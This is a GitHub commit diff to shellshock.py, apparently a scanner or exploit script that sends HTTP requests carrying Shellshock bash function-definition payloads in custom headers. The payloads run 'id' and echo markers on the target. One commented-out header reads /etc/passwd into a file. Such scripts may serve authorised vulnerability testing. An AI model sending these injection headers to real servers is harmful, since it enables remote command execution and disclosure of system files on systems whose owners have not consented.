Skip to content

Commit 4b9fc22

Browse files
committed
Update shellshock.py
1 parent 9210644 commit 4b9fc22

File tree

1 file changed

+4
-6
lines changed

1 file changed

+4
-6
lines changed

shellshock.py

Lines changed: 4 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -6,12 +6,10 @@
66
def get_request(url):
77
socket.setdefaulttimeout(5)
88
i_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
9-
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) "
10-
+"AppleWebKit/537.36 (KHTML, like Gecko) "
11-
+"Chrome/36.0.1985.125 Safari/537.36",
12-
"CustomHeaderNew": "() { _;} >_[$($($()))] "
13-
+"{ echo hi mom; id; echo yo daddy; echo;}",
14-
#"CustomHeader": "() { test;};echo; echo; echo shellshock one;",
9+
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
10+
"CustomHeader": "() { test;};echo; echo; echo shellshock one;",
11+
#"CustomHeaderNew": "() { _;} >_[$($())] { echo oh my lady gaga; id;}",
12+
"CustomHeaderNew": "() { _;} >shellshockme[$($($()))] { echo oh my lady gaga; id; echo go jimmy;}",
1513
#"CustomHeader2": "() { :; }; /bin/cat /etc/passwd > ./shellshock2.txt",
1614
#"CustomHeader2_1": "() { (a)=>\ echo; echo; echo date"
1715
}

0 commit comments

Comments
 (0)